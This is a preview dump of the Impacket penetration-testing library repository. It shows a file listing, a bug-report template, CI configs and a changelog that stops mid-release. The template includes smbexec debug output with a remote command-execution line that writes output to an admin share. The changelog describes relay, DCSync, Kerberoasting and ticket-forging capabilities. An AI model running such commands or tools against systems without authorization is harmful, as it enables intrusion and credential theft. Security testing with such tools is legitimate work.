Showing preview only (8,827K chars total). Download the full file or copy to clipboard to get everything.
Repository: fortra/impacket
Branch: master
Commit: d400a6aa6a7f
Files: 350
Total size: 8.4 MB
Directory structure:
gitextract_c4q1h4g5/
├── .github/
│ ├── ISSUE_TEMPLATE/
│ │ └── bug_report.md
│ ├── labeler.yml
│ └── workflows/
│ ├── build_and_test.yml
│ └── labeler.yml
├── .gitignore
├── ChangeLog.md
├── Dockerfile
├── LICENSE
├── MANIFEST.in
├── README.md
├── SECURITY.md
├── TESTING.md
├── examples/
│ ├── CheckLDAPStatus.py
│ ├── DumpNTLMInfo.py
│ ├── Get-GPPPassword.py
│ ├── GetADComputers.py
│ ├── GetADUsers.py
│ ├── GetLAPSPassword.py
│ ├── GetNPUsers.py
│ ├── GetUserSPNs.py
│ ├── addcomputer.py
│ ├── atexec.py
│ ├── attrib.py
│ ├── badsuccessor.py
│ ├── changepasswd.py
│ ├── dacledit.py
│ ├── dcomexec.py
│ ├── describeTicket.py
│ ├── dpapi.py
│ ├── esentutl.py
│ ├── exchanger.py
│ ├── filetime.py
│ ├── findDelegation.py
│ ├── getArch.py
│ ├── getPac.py
│ ├── getST.py
│ ├── getTGT.py
│ ├── goldenPac.py
│ ├── karmaSMB.py
│ ├── keylistattack.py
│ ├── kintercept.py
│ ├── lookupsid.py
│ ├── machine_role.py
│ ├── mimikatz.py
│ ├── mqtt_check.py
│ ├── mssqlclient.py
│ ├── mssqlinstance.py
│ ├── net.py
│ ├── netview.py
│ ├── ntfs-read.py
│ ├── ntlmrelayx.py
│ ├── owneredit.py
│ ├── ping.py
│ ├── ping6.py
│ ├── psexec.py
│ ├── raiseChild.py
│ ├── rbcd.py
│ ├── rdp_check.py
│ ├── reg.py
│ ├── registry-read.py
│ ├── regsecrets.py
│ ├── rpcdump.py
│ ├── rpcmap.py
│ ├── sambaPipe.py
│ ├── samedit.py
│ ├── samrdump.py
│ ├── secretsdump.py
│ ├── services.py
│ ├── smbclient.py
│ ├── smbexec.py
│ ├── smbserver.py
│ ├── sniff.py
│ ├── sniffer.py
│ ├── split.py
│ ├── ticketConverter.py
│ ├── ticketer.py
│ ├── tstool.py
│ ├── wmiexec.py
│ ├── wmipersist.py
│ └── wmiquery.py
├── impacket/
│ ├── Dot11Crypto.py
│ ├── Dot11KeyManager.py
│ ├── ICMP6.py
│ ├── IP6.py
│ ├── IP6_Address.py
│ ├── IP6_Extension_Headers.py
│ ├── ImpactDecoder.py
│ ├── ImpactPacket.py
│ ├── NDP.py
│ ├── __init__.py
│ ├── acl.py
│ ├── cdp.py
│ ├── crypto.py
│ ├── dcerpc/
│ │ ├── __init__.py
│ │ └── v5/
│ │ ├── __init__.py
│ │ ├── atsvc.py
│ │ ├── bkrp.py
│ │ ├── dcom/
│ │ │ ├── __init__.py
│ │ │ ├── comev.py
│ │ │ ├── oaut.py
│ │ │ ├── scmp.py
│ │ │ ├── vds.py
│ │ │ └── wmi.py
│ │ ├── dcomrt.py
│ │ ├── dhcpm.py
│ │ ├── drsuapi.py
│ │ ├── dssp.py
│ │ ├── dtypes.py
│ │ ├── enum.py
│ │ ├── epm.py
│ │ ├── even.py
│ │ ├── even6.py
│ │ ├── gkdi.py
│ │ ├── icpr.py
│ │ ├── iphlp.py
│ │ ├── lsad.py
│ │ ├── lsat.py
│ │ ├── mgmt.py
│ │ ├── mimilib.py
│ │ ├── ndr.py
│ │ ├── nrpc.py
│ │ ├── nspi.py
│ │ ├── oxabref.py
│ │ ├── par.py
│ │ ├── rpch.py
│ │ ├── rpcrt.py
│ │ ├── rprn.py
│ │ ├── rrp.py
│ │ ├── samr.py
│ │ ├── sasec.py
│ │ ├── scmr.py
│ │ ├── srvs.py
│ │ ├── transport.py
│ │ ├── tsch.py
│ │ ├── tsts.py
│ │ └── wkst.py
│ ├── dhcp.py
│ ├── dns.py
│ ├── dot11.py
│ ├── dpapi.py
│ ├── dpapi_ng.py
│ ├── eap.py
│ ├── ese.py
│ ├── examples/
│ │ ├── __init__.py
│ │ ├── ldap_shell.py
│ │ ├── logger.py
│ │ ├── mssqlshell.py
│ │ ├── ntlmrelayx/
│ │ │ ├── __init__.py
│ │ │ ├── attacks/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── dcsyncattack.py
│ │ │ │ ├── httpattack.py
│ │ │ │ ├── httpattacks/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── adcsattack.py
│ │ │ │ │ ├── sccmdpattack.py
│ │ │ │ │ └── sccmpoliciesattack.py
│ │ │ │ ├── imapattack.py
│ │ │ │ ├── ldapattack.py
│ │ │ │ ├── mssqlattack.py
│ │ │ │ ├── rpcattack.py
│ │ │ │ ├── smbattack.py
│ │ │ │ └── winrmattack.py
│ │ │ ├── clients/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── dcsyncclient.py
│ │ │ │ ├── httprelayclient.py
│ │ │ │ ├── imaprelayclient.py
│ │ │ │ ├── ldaprelayclient.py
│ │ │ │ ├── mssqlrelayclient.py
│ │ │ │ ├── rpcrelayclient.py
│ │ │ │ ├── smbrelayclient.py
│ │ │ │ ├── smtprelayclient.py
│ │ │ │ └── winrmrelayclient.py
│ │ │ ├── servers/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── httprelayserver.py
│ │ │ │ ├── mssqlrelayserver.py
│ │ │ │ ├── rawrelayserver.py
│ │ │ │ ├── rdprelayserver.py
│ │ │ │ ├── rpcrelayserver.py
│ │ │ │ ├── smbrelayserver.py
│ │ │ │ ├── socksplugins/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── http.py
│ │ │ │ │ ├── https.py
│ │ │ │ │ ├── imap.py
│ │ │ │ │ ├── imaps.py
│ │ │ │ │ ├── ldap.py
│ │ │ │ │ ├── ldaps.py
│ │ │ │ │ ├── mssql.py
│ │ │ │ │ ├── smb.py
│ │ │ │ │ └── smtp.py
│ │ │ │ ├── socksserver.py
│ │ │ │ ├── wcfrelayserver.py
│ │ │ │ ├── winrmrelayserver.py
│ │ │ │ └── winrmsrelayserver.py
│ │ │ └── utils/
│ │ │ ├── __init__.py
│ │ │ ├── config.py
│ │ │ ├── enum.py
│ │ │ ├── identity_log.py
│ │ │ ├── rdp_ssl.py
│ │ │ ├── shadow_credentials.py
│ │ │ ├── ssl.py
│ │ │ ├── targetsutils.py
│ │ │ └── tcpshell.py
│ │ ├── os_ident.py
│ │ ├── regsecrets.py
│ │ ├── remcomsvc.py
│ │ ├── rpcdatabase.py
│ │ ├── secretsdump.py
│ │ ├── serviceinstall.py
│ │ ├── smbclient.py
│ │ └── utils.py
│ ├── helper.py
│ ├── hresult_errors.py
│ ├── http.py
│ ├── krb5/
│ │ ├── __init__.py
│ │ ├── asn1.py
│ │ ├── ccache.py
│ │ ├── constants.py
│ │ ├── crypto.py
│ │ ├── gssapi.py
│ │ ├── kerberosv5.py
│ │ ├── keytab.py
│ │ ├── kpasswd.py
│ │ ├── pac.py
│ │ └── types.py
│ ├── ldap/
│ │ ├── __init__.py
│ │ ├── ldap.py
│ │ ├── ldapasn1.py
│ │ └── ldaptypes.py
│ ├── mapi_constants.py
│ ├── mqtt.py
│ ├── msada_guids.py
│ ├── mssql/
│ │ └── version.py
│ ├── nmb.py
│ ├── nt_errors.py
│ ├── ntlm.py
│ ├── pcap_linktypes.py
│ ├── pcapfile.py
│ ├── smb.py
│ ├── smb3.py
│ ├── smb3structs.py
│ ├── smbconnection.py
│ ├── smbserver.py
│ ├── spnego.py
│ ├── structure.py
│ ├── system_errors.py
│ ├── tds.py
│ ├── uuid.py
│ ├── version.py
│ ├── winregistry.py
│ └── wps.py
├── requirements-test.txt
├── requirements.txt
├── setup.py
├── tests/
│ ├── ImpactPacket/
│ │ ├── __init__.py
│ │ ├── test_ICMP6.py
│ │ ├── test_IP.py
│ │ ├── test_IP6.py
│ │ ├── test_IP6_Address.py
│ │ ├── test_IP6_Extension_Headers.py
│ │ ├── test_IP_fragment_issue2095.py
│ │ ├── test_LinuxSLL.py
│ │ ├── test_TCP.py
│ │ ├── test_TCP_bug_issue7.py
│ │ └── test_ethernet.py
│ ├── SMB_RPC/
│ │ ├── __init__.py
│ │ ├── test_acl.py
│ │ ├── test_ldap.py
│ │ ├── test_ndr.py
│ │ ├── test_nmb.py
│ │ ├── test_ntlm.py
│ │ ├── test_rpch.py
│ │ ├── test_rpcrt.py
│ │ ├── test_secretsdump.py
│ │ ├── test_smb.py
│ │ ├── test_smbserver.py
│ │ ├── test_spnego.py
│ │ └── test_wmi.py
│ ├── __init__.py
│ ├── conftest.py
│ ├── data/
│ │ ├── ccache-v1
│ │ ├── ccache-v2
│ │ ├── ccache-v3
│ │ ├── ccache-v3-kirbi
│ │ ├── ccache-v4
│ │ └── ccache-v4-kirbi
│ ├── dcerpc/
│ │ ├── __init__.py
│ │ ├── test_bkrp.py
│ │ ├── test_dcomrt.py
│ │ ├── test_dhcpm.py
│ │ ├── test_drsuapi.py
│ │ ├── test_epm.py
│ │ ├── test_even.py
│ │ ├── test_even6.py
│ │ ├── test_fasp.py
│ │ ├── test_lsad.py
│ │ ├── test_lsat.py
│ │ ├── test_mgmt.py
│ │ ├── test_mimilib.py
│ │ ├── test_nrpc.py
│ │ ├── test_par.py
│ │ ├── test_rprn.py
│ │ ├── test_rrp.py
│ │ ├── test_samr.py
│ │ ├── test_scmr.py
│ │ ├── test_srvs.py
│ │ ├── test_tsch.py
│ │ └── test_wkst.py
│ ├── dcetests.cfg.template
│ ├── dot11/
│ │ ├── __init__.py
│ │ ├── test_Dot11Base.py
│ │ ├── test_Dot11Decoder.py
│ │ ├── test_Dot11HierarchicalUpdate.py
│ │ ├── test_FrameControlACK.py
│ │ ├── test_FrameControlCFEnd.py
│ │ ├── test_FrameControlCFEndCFACK.py
│ │ ├── test_FrameControlCTS.py
│ │ ├── test_FrameControlPSPoll.py
│ │ ├── test_FrameControlRTS.py
│ │ ├── test_FrameData.py
│ │ ├── test_FrameManagement.py
│ │ ├── test_FrameManagementAssociationRequest.py
│ │ ├── test_FrameManagementAssociationResponse.py
│ │ ├── test_FrameManagementAuthentication.py
│ │ ├── test_FrameManagementDeauthentication.py
│ │ ├── test_FrameManagementDisassociation.py
│ │ ├── test_FrameManagementProbeRequest.py
│ │ ├── test_FrameManagementProbeResponse.py
│ │ ├── test_FrameManagementReassociationRequest.py
│ │ ├── test_FrameManagementReassociationResponse.py
│ │ ├── test_RadioTap.py
│ │ ├── test_RadioTapDecoder.py
│ │ ├── test_WEPDecoder.py
│ │ ├── test_WEPEncoder.py
│ │ ├── test_WPA.py
│ │ ├── test_WPA2.py
│ │ ├── test_helper.py
│ │ └── test_wps.py
│ ├── misc/
│ │ ├── __init__.py
│ │ ├── test_ccache.py
│ │ ├── test_crypto.py
│ │ ├── test_dcerpc_v5_ndr.py
│ │ ├── test_dns.py
│ │ ├── test_dpapi.py
│ │ ├── test_ip6_address.py
│ │ ├── test_krb5_crypto.py
│ │ ├── test_krb5_gssapi.py
│ │ ├── test_ntfs_read.py
│ │ ├── test_structure.py
│ │ └── test_utils.py
│ └── walkmodules.py
└── tox.ini
================================================
FILE CONTENTS
================================================
================================================
FILE: .github/ISSUE_TEMPLATE/bug_report.md
================================================
---
name: Bug report
about: Create a report to help us improve
title: ''
labels: ''
assignees: ''
---
### Configuration
impacket version:
Python version:
Target OS:
### Debug Output With Command String
i.e.
smbexec -debug domain/user:password@127.0.0.1
```
smbexec -debug domain/user:password@127.0.0.1
[+] StringBinding ncacn_np:127.0.0.1[\pipe\svcctl]
[+] Executing %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>net group
[+] Executing %COMSPEC% /Q /c echo net group ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
Traceback (most recent call last):
File "/usr/lib64/python3.7/cmd.py", line 214, in onecmd
func = getattr(self, 'do_' + cmd)
AttributeError: 'RemoteShell' object has no attribute 'do_net'
```
### PCAP
If applicable, add a packet capture to help explain your problem.
### Additional context
Space for additional context, investigative results, suspected issue.
================================================
FILE: .github/labeler.yml
================================================
# Rules to label Pull Requests
version: 1
labels:
- label: "Examples"
files:
- "examples/.*"
- label: "Library"
files:
- "impacket/.*"
- label: "CI/CD & Tests"
files:
- "tests/.*"
- "tox.ini"
- "Dockerfile"
- ".github/.*"
- label: "Setup"
files:
- "setup.py"
- "requirements*.txt"
- "MANIFEST.in"
- label: "Docs"
files:
- "*.md"
- "LICENSE"
================================================
FILE: .github/workflows/build_and_test.yml
================================================
# GitHub Action workflow to build and run Impacket's tests
#
name: Build and test Impacket
on: [push, pull_request]
env:
DOCKER_TAG: impacket:latests
jobs:
lint:
name: Check syntax errors and warnings
runs-on: ubuntu-latest
if:
github.event_name == 'push' || github.event.pull_request.head.repo.full_name !=
github.repository
steps:
- name: Checkout Impacket
uses: actions/checkout@v3
- name: Setup Python 3.8
uses: actions/setup-python@v4
with:
python-version: 3.8
- name: Install Python dependencies
run: |
python -m pip install flake8
- name: Check syntax errors
run: |
flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics
- name: Check PEP8 warnings
run: |
flake8 . --count --ignore=E1,E2,E3,E501,W291,W293 --exit-zero --max-complexity=65 --max-line-length=127 --statistics
test:
name: Run unit tests and build wheel
needs: lint
runs-on: ${{ matrix.os }}
if:
github.event_name == 'push' || github.event.pull_request.head.repo.full_name !=
github.repository
strategy:
fail-fast: false
matrix:
python-version: ["3.9", "3.10","3.11","3.12"]
experimental: [false]
os: [ubuntu-latest]
include:
- python-version: "3.13-dev"
experimental: true
os: ubuntu-latest
continue-on-error: ${{ matrix.experimental }}
steps:
- name: Checkout Impacket
uses: actions/checkout@v3
- name: Setup Python ${{ matrix.python-version }}
uses: actions/setup-python@v4
with:
python-version: ${{ matrix.python-version }}
- name: Install Python dependencies
run: |
python -m pip install --upgrade pip wheel
python -m pip install tox tox-gh-actions -r requirements.txt -r requirements-test.txt
- name: Run unit tests
run: |
tox -- -m 'not remote'
- name: Build wheel artifact
run: |
python setup.py bdist_wheel
docker:
name: Build docker image
needs: lint
runs-on: ubuntu-latest
if:
github.event_name == 'push' || github.event.pull_request.head.repo.full_name !=
github.repository
continue-on-error: true
steps:
- name: Checkout Impacket
uses: actions/checkout@v3
- name: Build docker image
run: |
docker build -t ${{ env.DOCKER_TAG }} .
================================================
FILE: .github/workflows/labeler.yml
================================================
# GitHub Action workflow to label Pull Requests
#
name: Label PRs
on:
- pull_request
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: srvaroa/labeler@master
env:
GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}"
================================================
FILE: .gitignore
================================================
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
# C extensions
*.so
# Distribution / packaging
.Python
env/
venv/
.env/
.venv/
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
*.egg-info/
.installed.cfg
*.egg
Pipfile
Pipfile.lock
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*,cover
# bak files
*.bak
# Translations
*.mo
*.pot
# Django stuff:
*.log
# Sphinx documentation
docs/_build/
# PyBuilder
target/
# macOS
.DS_Store
# PyCharm
.idea
# Test cases configuration
tests/dcetests.cfg
================================================
FILE: ChangeLog.md
================================================
# ChangeLog
Project owner's main page is at www.coresecurity.com.
Complete list of changes can be found at:
https://github.com/fortra/impacket/commits/master
## Impacket v0.13.0 (Oct 2025):
1. Library improvements
* Major SMB client/server refactor adds setInfo support, CIFS datetime helpers, and safer default share access to enable remote attribute and timestamp management. (@covertivy)
* Introduced per-structure encoding selectors and UTF-8-aware SMB structures so non-Latin resource names round-trip correctly. (@alexisbalbachan)
* Strengthened LDAP/Kerberos handling with channel binding plus signing, schema alignment with ldap3, and LDAPS-based LAPS retrieval against Windows Server 2025 DCs. (@zblurx, @alexisbalbachan, @Ibrahim8879)
* Improved DCE/RPC coverage with Netlogon authenticator fixes, updated DRS bind flags, expanded EVEN6 decoding, and a new ICPR interface to support relay-aware RPC workflows. (@ThePirateWhoSmellsOfSunflowers, @h3-josh-the-engineer, @NtAlexio2, @rtpt-romankarwacik)
* Corrected SMB negotiation edge cases by fixing response padding, Unicode pipe lookups, and keyboard interrupts in SMB servers. (@rtpt-erikgeiser, @Abyss-emmm, @exploide)
* SMB Server enhancements to align Impacket's implementation with standard (@jborean93)
2. Authentication & relay tooling
* Added WinRMS relay clients/servers. (@Defte_)
* Improved IPv6 support, richer logging, and consistent console status reporting, plus an identity log to track compromised principals ( @gabrielg5)
* Introduced an RPC relay server with Endpoint Mapper discovery . (@rtpt-romankarwacik)
* Delivered SCCM Management/Distribution Point relay attacks. (@q-roland)
* Enhanced shadow credentials, SOCKS plugins, and target rotation with better IPv6 awareness and stability. (@anadrianmanrique, @gabrielg5)
* Added options to strip SSP from Net-NTLMv1 captures and write relay-captured hashes for cracking workflows. (@TurtleARM, @p0rtL6)
3. Examples improvements
* secretsdump.py gained a WMI shadow snapshot path, export hive boot key recovery, safer DRS flags, user-status reporting, and refined NTDS parsing. (@PeterGabaldon, @MaxToffy, @h3-josh-the-engineer, @Markb1337, @snovvcrash)
* MSSQL tooling gained channel binding tokens, restored reliable connections, richer linked-server file transfers, and inline command execution. (@Defte_, @rtpt-romankarwacik, @trietend, @kiriknik, @Signum21)
* Directory ACL helpers (`dacledit`, `owneredit`, `rbcd`, `ldapshell`) picked up mask selection, safer queries, and consistent `-dc-host` handling. (@dadevel, @shellinvictus, @Fabrizzio53, @ICheer_No0M, @gabrielg5)
* SMB operator utilities add reconnect and autocomplete options in smbclient and prevent smbexec from hanging on completion. (@daddycocoaman, @trietend, @Vincent550102)
* Remote access helpers such as rdp_check and wmiexec now support IPv6 targets and display created Process IDs for easier triage. (@gabrielg5, @alexisbalbachan)
4. New examples
* [attrib.py](examples/attrib.py) manipulates file attributes over SMB to showcase the new setInfo workflow. (@covertivy)
* [filetime.py](examples/filetime.py) inspects and updates SMB file timestamps using the refreshed SMBConnection APIs. (@covertivy)
* [badsuccessor.py](examples/badsuccessor.py) demonstrates the AD CS “bad successor” attack path. (@fulc2um)
* [regsecrets.py](examples/regsecrets.py) extracts LSA secrets from remote registry hives through [MS-RRP]. (@laxaa, @laxa)
* [samedit.py](examples/samedit.py) edits local SAM password hashes offline. (@iorpim)
* [CheckLDAPStatus.py](examples/CheckLDAPStatus.py) checks LDAP signing status and LDAPS channel binding status. (@zblurx)
5. Project & packaging
* Added the `impacket.mssql` namespace, relaxed the pyOpenSSL pin, and declared Python 3.13 support while dropping 3.8. (@anadrianmanrique, @Defte_)
* Replaced pkg_resources with importlib.metadata for lightweight version discovery. (@AdrianVollmer)
6. Contributors
As always, thanks a lot to all these contributors that make this library better every day (up to now):
@Abyss-emmm, @AdrianVollmer, @NeffIsBack, @NtAlexio2, @rtpt-alexanderneumann, @asareynolds, @dadevel, @TurtleARM, @Defte_, @rtpt-erikgeiser, @Fabrizzio53, @fluffy-kaiju, @gabrielg5, @ICheer_No0M, @exploide, @jborean93, @nitbx, @laxaa, @daddycocoaman, @lucas0817, @Markb1337, @MaxToffy, @Ibrahim8879, @Narmjep, @NuclearFizzler, @iorpim, @CipherCloak, @PeterGabaldon, @b1two, @covertivy, @rtpt-romankarwacik, @ryanq47, @SAERXCIT, @Signum21, @ThePirateWhoSmellsOfSunflowers, @Vincent550102, @anadrianmanrique, @alexisbalbachan, @d0gkiller87, @Ridter, @fulc2um, @gjhami, @h3-josh-the-engineer, @kiriknik, @marcobarlottini, @p0rtL6, @q-roland, @shellinvictus, @trietend, @zblurx.
## Impacket v0.12.0 (Sep 2024):
1. Library improvements
* Fixed broken hRSetServiceObjectSecurity method (@rkivys)
* Removed dsinternals dependency (@anadrianmanrique)
* Fixed srvs.hNetrShareEnum returning erronous shares (@cnotin)
* Fixed lmhash computing to support non standard characters in the password (@anadrianmanrique)
* Assorted fixes when processing Unicode data (@alexisbalbachan)
* Added `[MS-GKDI]` Group Key Distribution Protocol implementation (@zblurx)
* Fixed incorrect padding in SMBSessionSetupAndX_Extended_ResponseData (@rtpt-erikgeiser)
* Upgraded dependency pyreadline -> pyreadline3 (@anadrianmanrique)
* SMB Server:
* Added query information level 0x0109 for smb1 "SMB_QUERY_FILE_STREAM_INFO" (@Adamkadaban)
* Fixed filename encoding in queryPathInformation (@JerAxxxxxxx)
* Fixed NextEntryOffset for large directory listings (@robnanola)
* Fixed server returning an empty folder when cutting and pasting recursive directories (@robnanola)
* DHCP: Fixed encoding issues (@ujwalkomarla)
3. Examples improvements
* [secretsdump.py](examples/secretsdump.py):
* Double DC Sync performance for DCs supporting SID lookups (@tomspencer)
* Added ability to skip dumping of SAM or SECURITY hives when performing remote operations (@RazzburyPi)
* Added ability to specify users to skip when dumping NTDS (@RazzburyPi)
* [ticketer.py](examples/ticketer.py):
* Support to create Sapphire tickets (@ShutdownRepo)
* [GetUserSPNs.py](examples/GetUserSPNs.py), [getTGT.py](examples/getTGT.py):
* Support for Kerberoasting without pre-authentication and ST request through AS-REQ (@ShutdownRepo)
* [wmiexec.py](examples/wmiexec.py):
* Fix kerberos with remoteHost & add '-target-ip'(@XiaoliChan)
* [ntlmrelayx.py](examples/ntlmrelayx.py):
* Added the creation of a new machine account through SMB (@BlWasp)
* NTLMRelayX Multirelay fixes for target handling, added --keep-relaying flag (@alexisbalbachan)
* Logging multirelay status when triggering the example (@gabrielg5)
* Write certificates to file rather than outputting b64 to console (@RazzburyPi)
* Improved ability to continue relaying to ADCS web enrollment endpoint in order to request multiple certificates for different users (@RazzburyPi)
* Fixed compatibility issue with other SMB clients connecting to the SOCKS proxy created by ntlmrelayx (@jfjallid)
* Allow configuration of the SOCKS5 address and port (@rtpt-erikgeiser)
* Fixed implementation of MSSQLShell (@gabrielg5)
* Logging notification of received connections in all relay servers (@gabrielg5)
* Add domain and username to interactive Ldap shell message (@minniear)
* Enhanced MSSQLShell in NTLMRelayX leveraging TcpShell & output messages (@gabrielg5)
* LDAP Attack: Bugfixes when parsing responses (@SAERXCIT)
* [getST.py](examples/getST.py):
* Added -self, -altservice and -u2u for S4U2self abuse, S4U2self+u2u, and service substitution (@ShutdownRepo)
* Added ability to set the RENEW ticket option to renew a TGT (@shikatano)
* Fixed unicode encoding error when using the -impersonate flag (@alexisbalbachan)
* [getTGT.py](examples/getTGT.py):
* Added principalType as new parameter (@DevSpork)
* [reg.py](examples/reg.py):
* Start remote registry as unprivileged user in reg.py (@dadevel)
* Allow adding Binary values (@dc3l1ne)
* Add missing Null byte for REG_SZ values (@PfiatDe)
* Support for adding REG_MULTI_SZ values through (@garbrielg5)
* [smbclient.py](examples/smbclient.py):
* Added ability to provide an output file that the smbclient mini shell will write commands and output to (@RazzburyPi)
* Fixed path parse issue when running `tree` command (@trietend)
* [smbserver.py](examples/smbserver.py):
* Added parameter "-outputfile" to set smbserver log file(gabrielg5)
* [DumpNTLMInfo.py](examples/DumpNTLMInfo.py):
* Allow execution on non-default ports (@jeffmcjunkin)
* Fixed KeyError exception when running with a Windows 2003 target (@XiaoliChan)
* [findDelegation.py](examples/findDelegation.py):
* Added new column to show if SPN exists (@p0dalirius)
* [mssqlclient.py](examples/mssqlclient.py):
* Added `-target-ip` parameter to allow Kerberos authentication without much change in the DNS configuration of the local machine (@Palkovsky)
* [mssqlshell.py](examples/mssqlshell.py):
* Switching back to original DB after running `enum_impersonate` command (@exploide)
* Fixed logging in printReplies showing error messages (@gabrielg5)
* [registry-read.py](examples/registry-read.py):
* Fixed scenario where value name contains backlash (@DidierA)
* [net.py](examples/net.py):
* Fixed User "Account Active" property value (@marcobarlottini)
* Fixed log messages printing variables in the wrong order (@Cyb3rC3lt)
* [rbcd.py](examples/rbcd.py):
* Handled SID not found in LDAP error (@ShutdownRepo)
* [GetUserSPNs.py](examples/GetUserSPNs.py):
* Updated the help information for -outputfile to be consistent with -save (@scarvell)
* [ntfs-read.py](examples/ntfs-read.py):
* Minor refactor in ntfs-read.py to make it more human-readable (@NtAlexio2)
* [ldap_shell.py](examples/ldap_shell.py):
* Added support for dirsync and whoami commands (@nurfed1)
* [lookupsid.py](examples/lookupsid.py):
* Now supports kerberos auth (@A1vinSmith)
* [samrdump.py](examples/samrdump.py):
* Will fetch AdminComment using MSRPC (@joeldeleep)
* [tstool.py](examples/tstool.py):
* Added support for kerberos auth, resolves SIDs (@nopernik)
4. New examples
* [describeTicket.py](examples/describeTicket.py): Ticket describer and decrypter. (@ShutdownRepo)
* [GetADComputers.py](examples/GetADComputers.py): Query's DC via LDAP and returns the COMPUTER objects and the useful attributes such as full dns name, operating system name and version. (@F-Masood)
* [GetLAPSPassword.py](examples/GetLAPSPassword.py): Extract LAPS passwords from LDAP (@zblurx and @dru1d-foofus)
* [dacledit.py](examples/dacledit.py): This script can be used to read, write, remove, backup, restore ACEs (Access Control Entries) in an object DACL (Discretionary Access Control List). (@ShutdownRepo) (@BlWasp_) (@Wlayzz)
* [owneredit.py](examples/owneredit.py): Added this script to abuse WriteOwner (ADS_RIGHT_WRITE_OWNER) access rights. This allows to take ownership of another object, and then edit that object's DACL (@ShutdownRepo) (@BlWasp_)
As always, thanks a lot to all these contributors that make this library better every day (up to now):
@tomspencer @anadrianmanrique @ShutdownRepo @dadevel @gjhami @NtAlexio2 @F-Masood @BlWasp @gabrielg5 @XiaoliChan @omry99 @Wlayzz @themaks @alexisbalbachan @RazzburyPi @jeffmcjunkin @p0dalirius @dc3l1ne @jfjallid @Palkovsky @rtpt-erikgeiser @trietend @zblurx @dru1d-foofus @PfiatDe @DidierA @marcobarlottini @PeterGabaldon @m8r1us @5yn @tzuralon @Adamkadaban @scarvell @JerAxxxxxxx @ujwalkomarla @robnanola @SAERXCIT @nurfed1 @A1vinSmith @joeldeleep @nopernik
## Impacket v0.11.0 (Aug 2023):
1. Library improvements
* Added new Kerberos error codes (@ly4k).
* Added `[MS-TSTS]` Terminal Services Terminal Server Runtime Interface Protocol implementation (@nopernik).
* Changed the setting up for new SSL connections (@mpgn, @CT-H00K and @0xdeaddood).
* Added a callback function to smbserver for incoming authentications (@p0dalirius).
* Fix crash in winregistry (@laxa)
* Fixes in IDispatch derived classes in comev implementation (@NtAlexio2)
* Fix CVE-2020-17049 in ccache.py (@godylockz)
* Smbserver: Added SMB2_FILE_ALLOCATION_INFO type determination (@JerAxxxxxxx)
* tds: Fixed python3 incompatibility when receiving over TLS socket (@exploide)
* crypto: Ensure passwords are utf-8 encoded before deriving Kerberos keys (@jojonas)
* ese: Fixed python3 incompatibility when reading from db (@alexisbalbachan)
* ldap queries: Escaped characters are now correctly parsed (@alexisbalbachan)
* Support SASL authentication in ldap protocol (@NtAlexio2)
2. Examples improvements
* [GetADUsers.py](examples/GetADUsers.py), [GetNPUsers.py](examples/GetNPUsers.py), [GetUserSPNs.py](examples/GetUserSPNs.py) and [findDelegation.py](examples/findDelegation.py):
* Added dc-host option to connect to specific KDC using its FQDN or NetBIOS name (@rmaksimov and @0xdeaddood).
* [GetNPUsers.py](examples/GetNPUsers.py)
* Printing TGT in stdout despite -outputfile parameter (@alexisbalbachan and @Zamanry)
* Fixed output hash format for AES128/256 (etype 17/18) (@erasmusc)
* [GetUserSPNs.py](examples/GetUserSPNs.py):
* Added LDAP paged search (@ThePirateWhoSmellsOfSunflowers and @SAERXCIT).
* Added a -stealth flag to remove the SPN filter from the LDAP query (@clavoillotte).
* Improved searchFilter (@ShutdownRepo)
* Use LDAP paged search (@ThePirateWhoSmellsOfSunflowers)
* [psexec.py](examples/psexec.py):
* Added support for name customization using a custom binary file (@Dramelac).
* [smbexec.py](examples/smbexec.py):
* Security fixes for privilege escalation vulnerabilities (@bugch3ck).
* Fixed python3 compatibility issues, added workaround TCP over NetBIOS being disabled (@ljrk0)
* [secretsdump.py](examples/secretsdump.py):
* Added a new option to extract only NTDS.DIT data for specific users based on an LDAP filter (@snovvcrash).
* Security fixes for privilege escalation vulnerabilities (@bugch3ck).
* [mssqlclient.py](examples/mssqlclient.py):
* Added multiple new commands. Now supports xp_dirtree execution (@Mayfly277, @trietend and @TurtleARM).
* [ntlmrelayx.py](examples/ntlmrelayx.py):
* Added ability to trigger SQLShell when running ntlmrelayx in interactive mode (@sploutchy).
* Added filter option to the socks command in ntlmrelayx CLI (@shoxxdj)
* Added ability to register DNS records through LDAP.
* [addcomputer.py](examples/addcomputer.py), [rbcd.py](examples/rbcd.py):
* Allow weak TLS ciphers for LDAP connections (@AdrianVollmer)
* [Get-GPPPassword.py](examples/Get-GPPPassword.py):
* Better handling of various XML files in Group Policy Preferences (@p0dalirius)
* [smbclient.py](examples/smbclient.py):
* Added recursive file listing (@Sq00ky)
* [ticketer.py](examples/ticketer.py):
* Ticket duration is now specified in hours instead of days (@Dramelac)
* Added extra-pac implementation (@Dramelac)
3. New examples
* [net.py](examples/net.py) Implementation of windows net.exe builtin tool (@NtAlexio2)
* [changepasswd.py](examples/changepasswd.py) New example that allows password changing or reseting through multiple protocols (@Alef-Burzmali, @snovvcrash, @bransh, @api0cradle and @p0dalirius)
* [DumpNTLMInfo.py](examples/DumpNTLMInfo.py) New example that dumps remote host information in ntlm authentication model, without credentials. For SMB protocols v1, v2 and v3. (@NtAlexio2)
